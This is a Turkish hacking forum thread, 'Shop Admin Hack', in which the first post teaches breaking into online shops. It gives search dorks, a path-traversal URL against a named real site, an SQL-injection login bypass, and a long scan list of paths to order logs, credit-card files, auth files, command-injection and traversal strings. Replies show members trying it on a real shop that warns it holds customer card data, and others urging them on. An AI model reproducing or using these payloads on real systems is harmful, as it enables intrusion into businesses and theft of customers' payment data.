Shop Admin Hack

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HolyDemon
    HolyDemon's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek

    Bu numara ile shop sitelerinin admin panellerini hackleyebilirsiniz.

    Gir : www.google.com

    Bunu ara : inurl:cgi-bin/commercesql

    Örnek : http://www.odysseylearningservices.com/cgi-bin/commercesql/

    Aşağıdaki zımbırtıyı linkin sonuna ekle

    /index.cgi?page=../admin/files/order.log

    Aşağıdaki link üstteki zımbırtıya örnektir.

    http://www.odysseylearningservices.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

    Sonrası Allah Kerim

    ------------------------

    Bir diğeri :

     

    www.google.com.tr gir

    arama kodumuz:: allinurl:/shopadmin.asp

    önümüze baya bir  site gelecek

    admin girişine giriyoruz

    user : 'or'1 pass : 'or'1

    yazıyoruz ve paneldeyiz

    --------------------------

     Shop admin hacklemek için scannerlar için taratabileceğiniz database uzantılarıda şunlar :

    /~gcw/cgi-bin/Count.cgi?df=callcard.dat
    /cgi-bin/PDG_Cart/shopper.conf
    /cgi-local/PDG_Cart/shopper.conf
    /cgi-bin/PDG_Cart/order.log
    /PDG_Cart/order.log
    /cgi-bin/cart32.exe/cart32clientlist
    /cgi-bin/Count.cgi?df=callcard.dat
    /cgi/PDG_Cart/order.log
    /PDG_Cart/authorizenets.txt
    /cgi-bin/PDG_Cart/mc.txt
    /PDG/order.txt
    /cgi-bin/PDG_cart/card.txt
    /PDG_Cart/shopper.conf
    /php/mlog.phtml
    /php/mylog.phtml
    /webcart/carts
    /cgi-bin/orders.txt
    /WebShop/logs
    /cgi-bin/AnyForm2
    /cgi-bin/mc.txt
    /ccbill/secure/ccbill.log
    /cgi-bin/orders/mc.txt
    /WebCart/orders.txt
    /cgi-bin/orders/cc.txt
    /cvv2.txt
    /cgi-bin/orderlog.txt
    /WebShop/logs
    /orderb/shop.mdb
    /_private/shopping_cart.mdb
    /scripts/iisadmin/tools/mkilog.exe
    /cool-logs/mylog.html
    /cool-logs/mlog.html
    /easylog/easylog.html
    /HyperStat/stat_what.log
    /mall_log_files/
    /scripts/weblog
    /super_stats/access_logs
    /trafficlog
    /wwwlog
    /Admin_files/order.log
    /bin/orders/orders.txt
    /cgi/orders/orders.txt
    /cgi-bin/orders/orders.txt
    /cgi-sys/orders/orders.txt
    /cgi-local/orders/orders.txt
    /htbin/orders/orders.txt
    /cgibin/orders/orders.txt
    /cgis/orders/orders.txt
    /scripts/orders/orders.txt
    /cgi-win/orders/orders.txt
    /bin/pagelog.cgi
    /cgi/pagelog.cgi
    /cgi-bin/pagelog.cgi
    /cgi-sys/pagelog.cgi
    /cgi-local/pagelog.cgi
    /cgibin/pagelog.cgi
    /cgis/pagelog.cgi
    /scripts/pagelog.cgi
    /cgi-win/pagelog.cgi
    /bin/DCShop/auth_data/auth_user_file.txt
    /cgi/DCShop/auth_data/auth_user_file.txt
    /cgi-bin/DCShop/auth_data/auth_user_file.txt
    /cgi-sys/DCShop/auth_data/auth_user_file.txt
    /cgi-local/DCShop/auth_data/auth_user_file.txt
    /htbin/DCShop/auth_data/auth_user_file.txt
    /cgibin/DCShop/auth_data/auth_user_file.txt
    /cgis/DCShop/auth_data/auth_user_file.txt
    /scripts/DCShop/auth_data/auth_user_file.txt
    /cgi-win/DCShop/auth_data/auth_user_file.txt
    /bin/DCShop/orders/orders.txt
    /cgi/DCShop/orders/orders.txt
    /cgi-bin/DCShop/orders/orders.txt
    /cgi-sys/DCShop/orders/orders.txt
    /cgi-local/DCShop/orders/orders.txt
    /htbin/DCShop/orders/orders.txt
    /cgibin/DCShop/orders/orders.txt
    /cgis/DCShop/orders/orders.txt
    /scripts/DCShop/orders/orders.txt
    /cgi-win/DCShop/orders/orders.txt
    /dc/auth_data/auth_user_file.txt
    /dcshop/orders/orders.txt
    /dcshop/auth_data/auth_user_file.txt
    /dc/orders/orders.txt
    /orders/checks.txt
    /orders/mountain.cfg
    /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
    /webcart/carts
    /webcart-lite/orders/import.txt
    /webcart/config
    /webcart/config/clients.txt
    /webcart/orders
    /webcart/orders/import.txt
    /WebShop/logs/cc.txt
    /WebShop/templates/cc.txt
    /bin/shop/auth_data/auth_user_file.txt
    /cgi/shop/auth_data/auth_user_file.txt
    /cgi-bin/shop/auth_data/auth_user_file.txt
    /cgi-sys/shop/auth_data/auth_user_file.txt
    /cgi-local/shop/auth_data/auth_user_file.txt
    /htbin/shop/auth_data/auth_user_file.txt
    /cgibin/shop/auth_data/auth_user_file.txt
    /cgis/shop/auth_data/auth_user_file.txt
    /scripts/shop/auth_data/auth_user_file.txt
    /cgi-win/shop/auth_data/auth_user_file.txt
    /bin/shop/orders/orders.txt
    /cgi/shop/orders/orders.txt
    /cgi-bin/shop/orders/orders.txt
    /cgi-sys/shop/orders/orders.txt
    /cgi-local/shop/orders/orders.txt
    /htbin/shop/orders/orders.txt
    /cgibin/shop/orders/orders.txt
    /cgis/shop/orders/orders.txt
    /scripts/shop/orders/orders.txt
    /cgi-win/shop/orders/orders.txt
    /bin/shop.pl/page=;cat%20shop.pl
    /cgi/shop.pl/page=;cat%20shop.pl
    /cgi-bin/shop.pl/page=;cat%20shop.pl
    /cgi-sys/shop.pl/page=;cat%20shop.pl
    /cgi-local/shop.pl/page=;cat%20shop.pl
    /htbin/shop.pl/page=;cat%20shop.pl
    /cgibin/shop.pl/page=;cat%20shop.pl
    /cgis/shop.pl/page=;cat%20shop.pl
    /scripts/shop.pl/page=;cat%20shop.pl
    /cgi-win/shop.pl/page=;cat%20shop.pl
    /bin/cart.pl
    /cgi/cart.pl
    /cgi-bin/cart.pl
    /cgi-sys/cart.pl
    /cgi-local/cart.pl
    /htbin/cart.pl
    /cgibin/cart.pl
    /scripts/cart.pl
    /cgi-win/cart.pl
    /cgis/cart.pl
    /bin/cart.pl
    /cgi/cart.pl
    /cgi-bin/cart.pl
    /cgi-sys/cart.pl
    /cgi-local/cart.pl
    /htbin/cart.pl
    /cgibin/cart.pl
    /cgis/cart.pl
    /scripts/cart.pl
    /cgi-win/cart.pl
    /bin/cart32.exe
    /cgi/cart32.exe
    /cgi-bin/cart32.exe
    /cgi-sys/cart32.exe
    /cgi-local/cart32.exe
    /htbin/cart32.exe
    /cgibin/cart32.exe
    /cgis/cart32.exe
    /scripts/cart32.exe
    /cgi-win/cart32.exe
    /cgi-bin/www-sql;;;
    /server%20logfile;;;
    /cgi-bin/pdg_cart/order.log
    /cgi-bin/shopper.exe?search
    /orders/order.log
    /orders/import.txt
    /orders/checks.txt
    /orders/orders.txt
    /Orders/order.log
    /order/order.log
    /WebShop/logs/ck.log
    /WebShop/logs/cc.txt
    /WebShop/templates/cc.txt
    /_private/orders.txt
    /_private/orders.htm
    /orders/mountain.cfg
    /PDG_Cart/shopper.config
    /Admin_files/order.log
    /mall_log_files/order.log
    /PDG_Cart/order.log
    /_private/shopping_cart.mdb
    /cgi-bin/shopper.cgi
    /cgi-bin/shop.cgi
    /cgi-bin/perlshop.cgi
    /cgi-bin/mall2000.cgi
    /log/
    /logfile/
    /logfiles/
    /logger/
    /logging/
    /logs/
    /logs/access_log
    /weblog/
    /weblogs/
    /cgi-bin/loadpage.cgi
    /database/
    /databases/
    /cgi-bin/Web_Store/web_store.cgi
    /scripts/cart32.exe
    /scripts/c32web.exe
    /cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
    /cgi-bin/DCShop/Orders/orders.txt
    /cgi-bin/ezmall2000/mall2000.cgi
    /cgi-bin/DCShop/Orders/orders.txt
    /cgi-bin/DCShop/Auth_data/auth_user_file.txt
    /cgi-bin/DCShop/Orders/orders.txt
    /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
    /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
    /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
    /cgi-bin/cart32/whatever-OUTPUT.txt
    /cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
    /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
    /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
    /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
    /derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
    /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
    /ccbill/secure/ccbill.log
    /cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
    /order13.txt
    /cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
    /cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
    /orders/db/zzzbizorders.log.html
    /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=otherrisinglogorder.log
    /cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
    /cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
    /cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
    /cgi-bin/shop.cgi/page=../../../../etc/hosts
    /cgi-bin/cart32/CART32-order.txt
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
    /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
    /cgi-bin/cart32.ini
    /cgi-bin/cart32.exe/cart32clientlist
    /cgi-bin/cart32.exe/error

    Hadi bakim kolay gelsin

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nickneyime
    nickneyime's avatar
    Kayıt Tarihi: 16/Temmuz/2003
    Erkek

    Hack attempt logged and will be reported to your ISP!

    IP: 88.239.83.169
    Remote port: 3419
    Host:

    :S bune la :|

    edüt büdüt: bişe olursa yaktım sni holy :P 


    bunch of idiots around me, yes everywhere.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HolyDemon
    HolyDemon's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    O shop menünün koruması war oraya giremessin yalnış denediğin için çıktı o kırmızı bi ekran ve itfaiye sireni ötüyo :) Ondan bi halt olmaz boşver başka site dene :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    seadog
    seadog's avatar
    Kayıt Tarihi: 23/Mart/2008
    Erkek

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    devlet istatistik ensititüsüne göre kişi başına düşen tuğla öldürüyormuş
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    qaMbLer
    qaMbLer's avatar
    Kayıt Tarihi: 02/Eylül/2005
    Erkek
    seadog bunu yazdı:
    -----------------------------

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    -----------------------------

    tamama bas ve gir :D

    adam 50 defa üzerinden geçmiş sitenin :D

    sen FBI dan bahsediosn :D  


    Burdan bütün kızlara sesleniyorum. Malın Varsa Zekatını Vereceksin Kardeşim
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    seadog
    seadog's avatar
    Kayıt Tarihi: 23/Mart/2008
    Erkek
    hacı  korkutmadır falan diye düşündüm ama yinede bi söliyim dedim :S:D

    devlet istatistik ensititüsüne göre kişi başına düşen tuğla öldürüyormuş
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    WarninG_ErroR
    WarninG_ErroR's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 21/Haziran/2007
    Erkek
    seadog bunu yazdı:
    -----------------------------

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    -----------------------------

    ne sakatı hocam gir ne yapacaksan yap :).... kredi kartı bilgilerinin oldugu bi sitede böyle açık mı olur ... user ve password'u girince başka birinin orayı hacklemiş olduğunu göreceksindir.


    helikopter kiralayıp norveçli üstsüzleri görsel taciz edesim var.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    skyvalet
    skyvalet's avatar
    Kayıt Tarihi: 25/Ağustos/2005
    Erkek
    fbi işi gücü yok bi admin paneline girdin die kapına gelcek:D
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    LizardKing
    LizardKing's avatar
    Kayıt Tarihi: 08/Ekim/2005
    Erkek
    seadog bunu yazdı:
    -----------------------------

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    -----------------------------

    yok anasının .mı :D ahauhauah FBI nedir ya :d 


    "Din en büyük rpg.dir.." arsiv.ozgurdusuncehareketi.org - evrimagaci.org
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sharp
    Sharp's avatar
    Kayıt Tarihi: 02/Temmuz/2007
    Erkek
    pessimist bunu yazdı:
    -----------------------------
    seadog bunu yazdı:
    -----------------------------

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    -----------------------------

    yok anasının .mı :D ahauhauah FBI nedir ya :d 


    -----------------------------

    tamam yüklenmeyin daha çocuğa :) emin olmak istemiş sadece :) 


    www.yesilgrow.com - Growshop
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    seadog
    seadog's avatar
    Kayıt Tarihi: 23/Mart/2008
    Erkek
    Never-More bunu yazdı:
    -----------------------------
    pessimist bunu yazdı:
    -----------------------------
    seadog bunu yazdı:
    -----------------------------

    www.vvoamc.com/shop/shopadmin.asp

    ben bu sitede denemeyecektim ekrana bu sayfada müşterilerin kredi kartı bilgileri falan bulundugu için düzenli log tutulmaktadır dedi ayrıca siz şu anda illegal giriş yaptınız dedi ve illegal girişleri FBI a bildiriyoruz 24 saat içinde kapınıza FBI gelirse şaşırmayın yazdı. ipneler bide sonuna iyi günler yazmıslar sakata gelmıyelim yaw :S:S


    -----------------------------

    yok anasının .mı :D ahauhauah FBI nedir ya :d 


    -----------------------------

    tamam yüklenmeyin daha çocuğa :) emin olmak istemiş sadece :) 


    -----------------------------

    evet ya yüklenmeyin bana yaa yazık deil mi bana :S:S


    devlet istatistik ensititüsüne göre kişi başına düşen tuğla öldürüyormuş
Toplam Hit: 11700 Toplam Mesaj: 24